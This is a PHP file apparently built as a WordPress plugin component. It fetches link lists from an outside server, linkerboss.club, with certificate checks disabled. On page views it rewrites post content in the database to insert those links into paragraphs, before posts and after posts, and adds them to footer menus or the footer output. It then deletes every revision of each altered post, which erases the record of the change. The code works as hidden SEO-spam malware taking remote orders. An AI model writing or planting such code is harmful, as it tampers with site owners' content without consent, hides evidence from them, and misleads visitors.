<?php
if (!defined('ABSPATH')) exit;

if (!function_exists('wp_doing_ajax')) {
    function wp_doing_ajax()
    {
        return defined('DOING_AJAX') && DOING_AJAX;
    }
}
if (!function_exists('wp_doing_cron')) {
    function wp_doing_cron()
    {
        return defined('DOING_CRON') && DOING_CRON;
    }
}

if (!function_exists('mb_strlen')) {
    function mb_strlen($str)
    {
        return strlen($str);
    }
}
if (!function_exists('mb_strpos')) {
    function mb_strpos($haystack, $needle, $offset = 0)
    {
        return strpos($haystack, $needle, $offset);
    }
}
if (!function_exists('mb_strtolower')) {
    function mb_strtolower($str)
    {
        return strtolower($str);
    }
}

if (!defined('LIBXML_HTML_NOIMPLIED')) define('LIBXML_HTML_NOIMPLIED', 0);
if (!defined('LIBXML_HTML_NODEFDTD')) define('LIBXML_HTML_NODEFDTD', 0);

function linker_detect_page_type($post_id = null)
{

    if (is_front_page()) return 'home';
    if (is_home()) return 'posts_index';

    if (is_singular()) {
        $post = get_post($post_id);
        if (!$post) return 'unknown';
        return $post->post_type;
    }

    if (is_category()) return 'category';
    if (is_tag()) return 'tag';
    if (is_tax()) return 'taxonomy';
    if (is_archive()) return 'archive';

    return 'unknown';
}

function linker_page_object_id_from_query(WP_Query $q, array $posts = [])
{
    if ($q->is_front_page()) return 0;
    if ($q->is_home()) return -1;
    if ($q->is_post_type_archive()) return -2;

    if ($q->is_singular() && !empty($posts)) {
        return (int)$posts[0]->ID;
    }

    $id = get_queried_object_id();
    return $id ?: -999;
}

function linker_canon_text($htmlOrText)
{
    $t = wp_strip_all_tags($htmlOrText, true);
    $t = preg_replace('/[\x{200B}-\x{200D}\x{2060}\x{FEFF}]/u', '', $t);
    return preg_replace('/\s+/u', ' ', trim($t));
}

function linker_remove_old_links($post_id, $content)
{
    $sigs = get_post_meta($post_id, '_linker_sigs', true);
    if (!is_array($sigs) || !$sigs) {
        return _linker_strip_notes_and_tidy($content);
    }

    if (class_exists('DOMDocument')) {
        try {
            libxml_use_internal_errors(true);

            $dom = new DOMDocument('1.0', 'UTF-8');
            $dom->loadHTML('<?xml encoding="utf-8" ?>' . $content, LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);

            $xpath = new DOMXPath($dom);

            foreach ($xpath->query('//a[@href]') as $a) {
                $href = $a->getAttribute('href');
                $text = $a->textContent;
                $sig = linker_link_sig($text, $href);

                if (in_array($sig, $sigs, true)) {
                    $a->parentNode->removeChild($a);
                }
            }

            foreach ($xpath->query("//div[contains(concat(' ', normalize-space(@class), ' '), ' small-note ')]") as $node) {
                $node->parentNode->removeChild($node);
            }

            $new = $dom->saveHTML();
            libxml_clear_errors();

            return $new;

        } catch (Exception $e) {
        }
    }


    $new = preg_replace_callback(
        '/<a\b([^>]*?)\bhref\s*=\s*(["\'])(.*?)\2([^>]*)>(.*?)<\/a>/isu',
        function ($m) use ($sigs) {
            $href = html_entity_decode($m[3], ENT_QUOTES | ENT_HTML5, 'UTF-8');
            $inner = trim(strip_tags($m[5]));
            $sig = linker_link_sig($inner, $href);

            return in_array($sig, $sigs, true) ? '' : $m[0];
        },
        $content
    );

    return _linker_strip_notes_and_tidy($new);
}

function _linker_strip_notes_and_tidy($html)
{
    return preg_replace(
        '/<div\b[^>]*class\s*=\s*(["\'])(?:(?!\1).)*\bsmall-note\b(?:(?!\1).)*\1[^>]*>.*?<\/div>/isU',
        '',
        $html
    );
}

function linker_get_page_links($post_id, $page_type = null)
{
    $is_home = is_front_page() || is_home();
    $cache_key = 'linker_static_' . ($is_home ? 'home' : $post_id);

    $cached = get_transient($cache_key);
    if ($cached !== false) {
        return $cached;
    }

    $page_type = $page_type ?: linker_detect_page_type($post_id);
    $api_url = add_query_arg([
        'domain' => parse_url(home_url(), PHP_URL_HOST),
        'page' => $is_home ? home_url('/') : get_permalink($post_id),
        'post_id' => $post_id,
        'page_type' => $page_type,
        'ver' => '2.0',
    ], 'https://linkerboss.club/api/links');

    $response = wp_remote_get($api_url, ['timeout' => 5, 'sslverify' => false]);
    if (is_wp_error($response)) {
        return [];
    }

    $resp = wp_remote_retrieve_body($response);

    $data = json_decode($resp, true);
    $ttl = isset($data['ttl']) ? max(30, min(intval($data['ttl']), 7 * DAY_IN_SECONDS)) : DAY_IN_SECONDS;
    if ($ttl > 0) {
        set_transient($cache_key, $data, $ttl);
    }

    if (!is_array($data) || empty($data['links'])) {
        return [];
    }

    return $data;
}

function linker_link_sig($anchor, $url)
{
    $raw = $url . '|' . linker_canon_text($anchor);
    return substr(hash_hmac('sha256', $raw, wp_salt()), 0, 12);
}

function linker_build_link_html($anchor, $url, $extra = [])
{
    global $linker_inserted_sigs;
    if (!is_array($linker_inserted_sigs)) $linker_inserted_sigs = [];

    $sig = linker_link_sig($anchor, $url);
    $linker_inserted_sigs[] = $sig;

    $style = isset($extra['style']) ? trim($extra['style']) : '';
    $class = isset($extra['class']) ? trim($extra['class']) : '';

    $attrs = 'href="' . esc_url($url) . '" target="_blank" style="' . esc_attr($style) . '"';
    if ($class) {
        $attrs .= ' class="' . esc_attr($class) . '"';
    }

    return ' <a ' . $attrs . '>' . esc_html($anchor) . '</a>';
}

function linker_apply_links_to_fragment_with_forced_insert($html, &$links, $limit, $seed)
{
    if ($limit <= 0 || empty($links)) return $html;

    $parts = preg_split('/(<[^>]+>)/u', $html, -1, PREG_SPLIT_DELIM_CAPTURE);
    $used = 0;

    foreach ($parts as &$part) {
        if ($used >= $limit) break;
        if (isset($part[0]) && $part[0] === '<') continue;

        $sentences = preg_split('/(?<=[\.!\?…])\s+/u', $part, -1, PREG_SPLIT_NO_EMPTY);
        if (!$sentences) continue;

        foreach ($links as $i => $l) {
            if ($used >= $limit) break;

            $a = trim(isset($l['anchor']) ? $l['anchor'] : '');
            $u = trim(isset($l['url']) ? $l['url'] : '');
            if (!$a || !$u) continue;

            $link_html = linker_build_link_html($a, $u);

            $pattern = '/(?<![\p{L}\p{N}_])' . preg_quote($a, '/') . '(?![\p{L}\p{N}_])/iu';

            $start = count($sentences) ? (crc32($a . '|' . $seed) % count($sentences)) : 0;
            $done = false;

            for ($k = 0; $k < count($sentences); $k++) {
                $idx = ($start + $k) % count($sentences);
                if (preg_match($pattern, $sentences[$idx])) {
                    $sentences[$idx] = preg_replace($pattern, $link_html, $sentences[$idx], 1);
                    $done = true;
                    break;
                }
            }

            if (!$done) {
                $pos = count($sentences) ? (crc32('ins|' . $a . '|' . $seed) % count($sentences)) : 0;
                $sentences[$pos] .= ' ' . $link_html;
            }

            unset($links[$i]);
            $used++;
        }

        $part = implode(' ', $sentences);
    }

    return implode('', $parts);
}

function linker_apply_links_paragraphs($content, array &$links, $max_links, $seed)
{
    if ($max_links <= 0 || empty($links)) return $content;
    $seed = (string)($seed ?: (string)crc32($content));

    $is_faq_heading = function ($h) {
        $t = strip_tags($h);
        return (stripos($t, 'faq') !== false) || (stripos($t, 'frequently asked questions') !== false);
    };

    preg_match_all('/<(h[1-6])[^>]*>.*?<\/\1>/isu', $content, $hms, PREG_OFFSET_CAPTURE);
    $faq_ranges = [];
    if ($hms && !empty($hms[0])) {
        $matches0 = (!empty($hms[0]) && is_array($hms[0])) ? $hms[0] : array();

        $heads = array_map(function ($m) {
            return $m[0];
        }, $matches0);
        $offs = array_map(function ($m) {
            return $m[1];
        }, $matches0);

        for ($i = 0; $i < count($heads); $i++) {
            if ($is_faq_heading($heads[$i])) {
                $start = $offs[$i];
                $end = isset($offs[$i + 1]) ? $offs[$i + 1] : strlen($content);
                $faq_ranges[] = [$start, $end];
            }
        }
    }

    $in_faq_range = function ($start_off, $end_off) use ($faq_ranges) {
        if (empty($faq_ranges)) return false;
        foreach ($faq_ranges as $range) {
            if (!is_array($range) || count($range) < 2) continue;
            $s = $range[0];
            $e = $range[1];
            if ($start_off < $e && $end_off > $s) return true;
        }
        return false;
    };

    preg_match_all('/(<p[^>]*>)(.*?)(<\/p>)/isu', $content, $matches, PREG_SET_ORDER | PREG_OFFSET_CAPTURE);
    if (!$matches) return linker_apply_links_plain($content, $links, $max_links, $seed);

    $paras = [];
    foreach ($matches as $idx => $m) {
        $p_full = $m[0][0];
        $p_start = $m[0][1];
        $p_end = $p_start + strlen($p_full);
        $start_tag = $m[1][0];
        $inner = $m[2][0];
        $end_tag = $m[3][0];

        $near_heading = false;
        foreach (isset($hms[0]) ? $hms[0] : [] as $h) {
            $h_off = $h[1];
            $h_len = strlen($h[0]);
            if (abs($p_start - $h_off) < 50 || abs($p_end - ($h_off + $h_len)) < 50) {
                $near_heading = true;
                break;
            }
        }
        if ($near_heading) continue;

        if ($in_faq_range($p_start, $p_end)) continue;

        if (preg_match('/<(ul|ol|li|table|tr|td|th|figure|img|pre|code)[^>]*>/i', $inner)) continue;

        if (preg_match('#<a\b[^>]*>#i', $inner)) continue;

        $text = trim(strip_tags($inner));
        $len = mb_strlen($text);

        if ($len < 100) continue;
        if (mb_strpos($text, '?') !== false) continue;

        $paras[] = [
            'i' => $idx,
            'full' => $p_full,
            'inner' => $inner,
            'start' => $start_tag,
            'end' => $end_tag,
            'len' => $len,
            'off_s' => $p_start,
            'off_e' => $p_end,
        ];
    }

    if (!$paras) return linker_apply_links_plain($content, $links, $max_links, $seed);

    $min_chars_before_first = 120;
    $running = 0;
    $cands = [];
    foreach ($paras as $p) {
        $running += $p['len'];
        if ($running >= $min_chars_before_first) $cands[] = $p;
    }
    if (!$cands) $cands = $paras;

    usort($cands, function ($a, $b) use ($seed) {
        $ha = (int)sprintf('%u', crc32($seed . '|' . $a['i'])) % 1000;
        $hb = (int)sprintf('%u', crc32($seed . '|' . $b['i'])) % 1000;

        if ($ha === $hb) {
            if ($a['len'] == $b['len']) return 0;
            return ($b['len'] > $a['len']) ? 1 : -1;
        }
        return ($ha < $hb) ? -1 : 1;
    });

    $chosen = [];
    $taken_idx = [];
    foreach ($cands as $p) {
        if (count($chosen) >= $max_links) break;
        $i = $p['i'];
        if (isset($taken_idx[$i]) || isset($taken_idx[$i - 1]) || isset($taken_idx[$i + 1])) continue;
        $chosen[] = $p;
        $taken_idx[$i] = true;
    }

    foreach ($chosen as $p) {
        if (empty($links)) break;

        $l = array_shift($links);
        $anchor = trim(isset($l['anchor']) ? $l['anchor'] : '');
        $url = trim(isset($l['url']) ? $l['url'] : '');
        if (!$anchor || !$url) continue;

        $link_html = linker_build_link_html($anchor, $url);
        $text = $p['inner'];

        $pattern = '/(?<![\p{L}\p{N}_])' . preg_quote($anchor, '/') . '(?![\p{L}\p{N}_])/iu';
        if (preg_match($pattern, $text)) {
            $new = preg_replace($pattern, $link_html, $text, 1);
        } else {
            $new = rtrim($text);
            if ($new !== '' && !preg_match('/[\.!\?…]\s*$/u', $new)) $new .= '.';
            $new .= ' ' . $link_html;
        }

        $new = preg_replace('/(\p{L}|\p{N})(<a\b)/u', '$1 $2', $new);
        $new = preg_replace('/(<\/a>)(\p{L}|\p{N})/u', '$1 $2', $new);

        $replacement = $p['start'] . $new . $p['end'];
        $content = str_replace($p['full'], $replacement, $content);
    }

    return $content;
}

function linker_apply_links_plain($content, array &$links, $max_links, $seed)
{
    return linker_apply_links_to_fragment_with_forced_insert($content, $links, $max_links, $seed . '|plain');
}

function linker_process_main_query_once($posts, $q)
{
    global $linker_inserted_sigs;

    if (
        is_admin() || is_feed() || is_preview() || wp_doing_ajax() || wp_doing_cron() ||
        empty($posts) || !$q instanceof WP_Query || !$q->is_main_query() || !$q->is_singular()
    ) {
        return $posts;
    }


    $post = $posts[0];
    $real_post_id = $post->ID;

    $lock_key = 'linker_lock_' . $real_post_id;
    if (get_transient($lock_key)) {
        return $posts;
    }
    set_transient($lock_key, 1, 20);

    $linker_inserted_sigs = [];
    try {
        $page_obj_id = linker_page_object_id_from_query($q, $posts);
        $now = time();

        $next_update = (int)get_post_meta($real_post_id, '_linker_next_update', true);
        if ($next_update && $now < $next_update) {
            $left = $next_update - $now;
            return $posts;
        }

        $data = linker_get_page_links($page_obj_id);
        if (empty($data['links'])) {
            $retry_ttl = 15 * MINUTE_IN_SECONDS;
            update_post_meta($real_post_id, '_linker_next_update', $now + $retry_ttl);
            return $posts;
        }

        $mode = isset($data['mode']) ? $data['mode'] : 'replace';
        $max_links = intval(isset($data['max_links']) ? $data['max_links'] : 3);

        $ttl_api = max(30, min(intval(isset($data['ttl']) ? $data['ttl'] : DAY_IN_SECONDS), 7 * DAY_IN_SECONDS));

        $content = $post->post_content;

        if ($mode === 'replace') {
            $content = linker_remove_old_links($real_post_id, $content);
        }

        // before
        $before = array_values(array_filter($data['links'], function ($l) {
            return (isset($l['position']) ? $l['position'] : '') === 'before';
        }));

        if ($before) {
            $links_html = [];
            foreach ($before as $l) $links_html[] = linker_build_link_html($l['anchor'], $l['url']);
            if ($links_html) {
                $content = '<p>' . implode(' ', $links_html) . '</p>' . $content;
            }
        }

        // content
        $content_links = array_values(array_filter($data['links'], function ($l) {
            return (isset($l['position']) ? $l['position'] : 'content') === 'content';
        }));
        if ($content_links) {
            $seed = $page_obj_id . '|' . get_permalink($page_obj_id);
            if (preg_match('/<p[^>]*>/i', $content)) {
                $content = linker_apply_links_paragraphs($content, $content_links, $max_links, $seed);
            } else {
                $content = linker_apply_links_plain($content, $content_links, $max_links, $seed);
            }
        }

        // after
        $after = array_values(array_filter($data['links'], function ($l) {
            return (isset($l['position']) ? $l['position'] : '') === 'after';
        }));
        if ($after) {
            $block = '';
            foreach ($after as $l) $block .= linker_build_link_html($l['anchor'], $l['url']) . ' ';
            $content .= '<p>' . trim($block) . '</p>';
        }

        if ($content !== $post->post_content) {
            wp_update_post([
                'ID' => $real_post_id,
                'post_content' => $content,
            ]);

            update_post_meta(
                $real_post_id,
                '_linker_sigs',
                array_values(array_unique(isset($linker_inserted_sigs) ? $linker_inserted_sigs : []))
            );

            $post->post_content = $content;
            $posts[0] = $post;

            clean_post_cache($real_post_id);
            wp_cache_delete($real_post_id, 'posts');

            try {
                $revs = wp_get_post_revisions($real_post_id, ['orderby' => 'date', 'order' => 'DESC']);
                foreach ($revs as $rev) {
                    wp_delete_post_revision($rev->ID);
                }
            } catch (Exception $e) {
            }
        }

        update_post_meta($real_post_id, '_linker_next_update', $now + $ttl_api);
    } catch (Exception $e) {
    }

    return $posts;
}

add_action('init', 'linker_footer_boot');
add_action('linker_footer_sync_event', 'linker_sync_footer_links');

function linker_footer_boot()
{
    if (!wp_next_scheduled('linker_footer_sync_event')) {
        wp_schedule_event(time() + 300, 'twicedaily', 'linker_footer_sync_event');
    }

    add_action('template_redirect', 'linker_footer_lazy_sync');
}

function linker_footer_lazy_sync()
{
    if (is_admin() || wp_doing_ajax() || wp_doing_cron()) {
        return;
    }
    $next = (int)get_option('_linker_footer_next_update', 0);
    $now = time();

    if ($now >= $next) {
        linker_sync_footer_links();
    }
}

function linker_get_footer_links_data()
{
    $data = linker_get_page_links(0, 'footer');

    if (!is_array($data)) {
        $data = [];
    }

    $data['links'] = array_values(array_filter(isset($data['links']) ? $data['links'] : [], function ($l) {
        return ((isset($l['position']) ? $l['position'] : '') === 'footer');
    }));

    if (!isset($data['ttl'])) $data['ttl'] = DAY_IN_SECONDS;

    $ttl_api = max(30, min((int)(isset($data['ttl']) ? $data['ttl'] : DAY_IN_SECONDS), 7 * DAY_IN_SECONDS));
    update_option('_linker_footer_next_update', time() + $ttl_api);

    return $data;
}

function linker_footer_menu_id($location)
{
    $locs = get_theme_mod('nav_menu_locations', []);
    if (!empty($locs[$location])) {
        return (int)$locs[$location];
    }

    $menu_name = 'Footer';
    $menu_obj = wp_get_nav_menu_object($menu_name);
    $menu_id = $menu_obj ? $menu_obj->term_id : 0;

    if (!$menu_id) {
        $menu_id = (int)wp_create_nav_menu($menu_name);
    }

    $locs[$location] = $menu_id;
    set_theme_mod('nav_menu_locations', $locs);
    return $menu_id;
}

function linker_sync_footer_links()
{
    $lock_key = 'linker_footer_lock';
    if (get_transient($lock_key)) {
        return;
    }
    set_transient($lock_key, 1, 20);

    try {
        $data = linker_get_footer_links_data();
        $links = [];

        foreach ((isset($data['links']) ? $data['links'] : []) as $l) {
            $a = trim(isset($l['anchor']) ? $l['anchor'] : '');
            $u = trim(isset($l['url']) ? $l['url'] : '');
            if ($a && $u) {
                $sig = linker_link_sig($a, $u);
                $links[] = ['anchor' => $a, 'url' => $u, 'sig' => $sig];
            }
        }

        if (!$links) {
            return;
        }

        $location = linker_get_footer_location_key();

        if (!$location) {
            return;
        }

        $menu_id = linker_footer_menu_id($location);
        if (!$menu_id) {
            return;
        }

        $existing = wp_get_nav_menu_items($menu_id, ['post_status' => 'any']);

        $existing_by_sig = [];
        foreach ((array)$existing as $item) {
            $sig = get_post_meta($item->ID, '_linker_sig', true);
            if ($sig) $existing_by_sig[$sig] = $item;
        }

        $desired_sigs = array_column($links, 'sig');

        foreach ($existing_by_sig as $sig => $item) {
            if (!in_array($sig, $desired_sigs, true)) {
                wp_delete_post($item->ID, true);
            }
        }

        $order = 0;
        foreach ($links as $l) {
            $sig = $l['sig'];
            $args = [
                'menu-item-title' => $l['anchor'],
                'menu-item-url' => $l['url'],
                'menu-item-status' => 'publish',
                'menu-item-position' => $order,
                'menu-item-target' => '_blank',
                'menu-item-classes' => 'linker-footer',
            ];

            if (isset($existing_by_sig[$sig])) {
                $item_id = (int)$existing_by_sig[$sig]->ID;
                wp_update_nav_menu_item($menu_id, $item_id, $args);
            } else {
                $new_id = wp_update_nav_menu_item($menu_id, 0, $args);
                if ($new_id && !is_wp_error($new_id)) {
                    update_post_meta($new_id, '_linker_sig', $sig);
                }
            }
            $order++;
        }

    } catch (Exception $e) {
    } finally {
        delete_transient('linker_footer_lock');
    }
}


function linker_get_footer_location_key()
{
    $locs = get_registered_nav_menus();
    if (!$locs) return null;

    foreach ($locs as $key => $label) {
        $lbl = mb_strtolower($label . ' ' . $key);
        if (strpos($lbl, 'footer') !== false || strpos($lbl, 'подвал') !== false) {
            return $key;
        }
    }
    return null;
}


add_action('wp_footer', 'linker_direct_footer_output', 99);

function linker_direct_footer_output()
{
    if (is_admin() || wp_doing_ajax() || wp_doing_cron()) {
        return;
    }

    $footer_key = linker_get_footer_location_key();

    if ($footer_key && has_nav_menu($footer_key)) {
        return;
    }

    $data = linker_get_page_links(0, 'footer');

    if (!is_array($data) || empty($data['links'])) {
        return;
    }

    $links = array_values(array_filter($data['links'], function ($l) {
        return ((isset($l['position']) ? $l['position'] : '') === 'footer');
    }));

    if (!$links) {
        return;
    }

    echo '<div>';
    foreach ($links as $l) {
        $a = trim(isset($l['anchor']) ? $l['anchor'] : '');
        $u = trim(isset($l['url']) ? $l['url'] : '');
        if (!$a || !$u) continue;

        echo '<a href="' . esc_url($u) . '" target="_blank">'
            . esc_html($a) .
            '</a> ';
    }
    echo '</div>';
}
